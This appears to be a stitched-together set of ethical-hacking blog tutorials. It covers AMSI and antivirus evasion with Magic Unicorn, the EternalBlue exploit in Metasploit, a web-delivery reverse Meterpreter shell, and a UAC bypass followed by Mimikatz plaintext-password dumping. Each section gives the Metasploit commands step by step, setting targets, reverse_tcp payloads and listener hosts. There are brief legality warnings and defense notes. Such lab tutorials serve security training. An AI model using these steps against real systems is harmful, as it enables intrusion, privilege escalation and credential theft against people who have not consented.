AV & AMSI Bypass with Magic Unicorn

If you have been wondering why many PowerShell based shells haven’t been working, you can thank Windows’ AMSI. If you still need to use PowerShell based shells, check out the latest version of Trusted Sec’s Magic Unicorn tool.

According to Microsoft, the Antimalware Scan Interface (AMSI) is an interface that “provides enhanced malware protection for users and their data, applications, and workloads”. A newer piece to the Anti-Virus bypass cat and mouse game. Just as there is with regular anti-virus, there has been an almost constant battle between AMSI and utilities to bypass its ability to catch and block PowerShell based remote shells.

The TrustedSec team has been very active in updating their “Magic Unicorn” PowerShell tool to evade AV and AMSI, and this is evident in their latest Unicorn update.

Installation and using Magic Unicorn is very simple in Kali Linux:

Installing Magic Unicorn

Then change to the unicorn directory and run it.

  • cd /unicorn
  • ./unicorn.py

When you run Magic Unicorn, you are given a complete set of usage examples. More information is available on the GitHub site, so I am not going to discuss tool usage. Though generated payloads can be found in the /unicorn directory.

Magic Unicorn usage features

The big question, does it work?

That would be a yes:

Remote PowerShell shell with Magic Unicorn

Best defenses against attacks like this is to be very leery of e-mail attachments & suspicious links. Protect physical access to your computers. Disable or remove old PowerShell versions.  Enable PowerShell monitoring. Install all Windows & AV updates. Run a good network security program. Also, a good Network Security Monitoring system is always helpful in case the worse happens.

Check out the Magic Unicorn Github site for more information.

https://www.trustedsec.com/unicorn/

Advertisements

Using the “NSA” EternalBlue exploit on Metasploitable 3

In this tutorial, we will see how to use the “EternalBlue” MS17-010 SMB exploit in Metasploit on Kali Linux to obtain a remote shell in Metasploitable 3, which uses Windows Server 2008.

Introduction

EternalBlue is one of several tools that were allegedly created and used by the NSA. The tools were publicly dumped by a hacker group called “Shadow Brokers” in April. The exploit has been modified and adapted to work as a Metasploit module and has been added to the latest Metasploit version. EternalBlue is a good exploit for Ethical Hackers to try in a test environment as it works very well and returns a System level shell when successful.

Preface

I had to manually update the Metasploit in Kali, as of the time of this writing the EternalBlue exploit was not available in the latest Kali update. Also, there seems to be some issues with the latest Metasploitable 3 install, as several of the service ports that should be open were blocked and it seems some services were not available.

As always, never attempt to access or test a system that you do not have express permission to do so, doing so is illegal and you could end up in jail.

Tutorial

Enough introduction, let’s see the exploit in action!

  • Start the Metasploit framework.
  • In Metasploit, enter “search eternalblue

  • Type, “use exploit/windows/smb/ms17_010_eternalblue

Now you can enter “show options” to see what options are available:

There is not really much you need to do. Just set the target IP (RHOST), and select a payload:

  • set RHOST 192.168.1.127
  • set payload windows/x64/meterpreter/reverse_tcp

You can type “show options” again to see what options need to be set for the payload, but all we need is the Kali IP address (LHOST):

  • set LHOST 192.168.1.3
  • Finally, type “exploit

And we have a shell!

You can type “help” top see all the available Meterpreter commands or just type “shell” for a remote command shell:

And that is it!

Defense

The best mitigation against this attack is to make sure all of your Windows systems are patched and up to date. This exploit has been patched for a while now. It is also a good idea to disable SMB v1, but you must realize the impact that this could have on your network before doing so, and decide if this would be a viable solution for your company.

If you liked this tutorial and want to learn a lot more about Kali, Metasploit and Ethical Hacking, check out my “Basic Security Testing with Kali Linux 2” book.

Easy Remote Shells with Web Delivery

This is a sneak peak at a section of the “Web Delivery” chapter in my new Ethical Hacking book, “Intermediate Security Testing with Kali Linux 2“. The Metasploit Web Delivery module is one of the easiest ways to quickly get a remote shell from a Linux, Mac or Windows system. In the full chapter I show how to use it against all three platforms. For the preview we will only cover Windows based targets.

As always, never try to access a network or system that you do not have express written permission to do so. Accessing systems that you don’t have permission to is illegal and you could end up in jail.

Web Delivery

In this section we will learn how to  using the Web Delivery exploit module. We will be using Metasploit and our Windows 7 VM as the target.

Let’s get started!

1. From a Kali terminal, type “msfconsole”:

Metasploit Web Delivery 1
2. Now enter:

  •  use exploit/multi/script/web_delivery
  •  set lhost [Kali IP Address]
  •  set lport 4444

3. Type, “show targets”:

Metasploit Web Delivery 2

Notice we have 3 options, Python, PHP and PSH (PowerShell). We will be attacking a Windows system, so we will use PowerShell.

4. Enter, “set target 2”
5. Set the payload, “set payload windows/meterpreter/reverse_tcp”
6. You can check that everything looks okay with “show options”:

Metasploit Web Delivery 3
7. Now type, “exploit”:

Metasploit Web Delivery 4

This starts a listener server that hosts our payload and then waits for an incoming connection. All we need to do is run the generated PowerShell command on our target system.

8. On the Windows 7 system, open a command prompt and paste in and execute the PowerShell command:

Metasploit Web Delivery 5
And after a few seconds you should see:

Metasploit Web Delivery 6

A meterpreter session open!

9. Now type, “sessions” to list the active sessions
10. Connect to it with “sessions -i 1”

Metasploit Web Delivery 7

We now have a full Meterpreter shell to the target:

Metasploit Web Delivery 8
Type “exit” to quit the active session and “exit” again to exit Metasploit.

I hope you enjoyed this chapter section preview. In the full chapter, I show how Web Delivery can be set to work against Linux and Mac systems also. In addition in the Msfvenom chapter you will also see how to make standalone executable shells that don’t require the target to open a command prompt on their system and manually run the code.

For a lot more ethical hacking training and hands on tutorials, check out “Intermediate Security Testing with Kali Linux 2” available on Amazon.com.

System level Access and Plain Text Passwords using Bypass UAC and Mimikatz

If you can get a remote shell during a penetration test, Metasploit’s Bypass UAC module is great for disabling that pesky UAC and escalating an account with admin privileges to the all powerful System level access. The problem is it doesn’t seem to work anymore – so let’s see what changed and get some plain text passwords while we are at it!

Its been a while since I have used Metasploit’s Bypass UAC module and when I went to use it recently, it kept erroring out. Once you had a remote shell with Metasploit all you used to have to do was call the Bypass UAC module, set the session number of the active session and run it. The solution is simple, the module usage has changed slightly.

We will start with an active session to a Windows 7 system:

BypassUAC Metasploit 1

From here, enter:

  • use exploit/windows/local/bypassuac_injection
  • set session 1
  • set payload windows/meterpreter/reverse_tcp
  • set lhost [Kali’s IP Address]
  • set lport 4545 (Important: use a different port from one used for original shell)
  • exploit

This should execute the Bypass UAC module, creating a new session with UAC disabled:

BypassUAC Metasploit 2

Now if we type “getsystem” it should work, as verified by “getuid”:

BypassUAC Metasploit 3

Now that we have a System level shell, what can we do?

Pretty much anything we want. Recover clear text passwords you say? Sure!

Type, “load kiwi“:

BypassUAC Mimikatz 4

Then type, “creds_all“:

BypassUAC Mimikatz 5

Oh look, user “Dan” is using the hyper secure password of “password” – Yikes, not good!

Bypass UAC is now a full exploit module, which means that you need to actually set a payload for it. I recommend using the same one that you got the original shell with. But make sure that when you set up the payload for Bypass UAC that you select a different port number for it to use or it will error out. So on mine, the port used to create session one was 4444, so I chose port 4545 for the UAC exploit.

Lastly, once we had the second shell created by Bypass UAC, we quickly elevated our privileges to system level with the “getsystem” command. Lastly, we used the amazing Mimikatz “Kiwi” extension to grab the plain text passwords for the win!

Want to learn how to use Metasploit and a whole lot more? Check out my book, “Basic Security Testing with Kali Linux” – Also a follow up book is coming out very soon!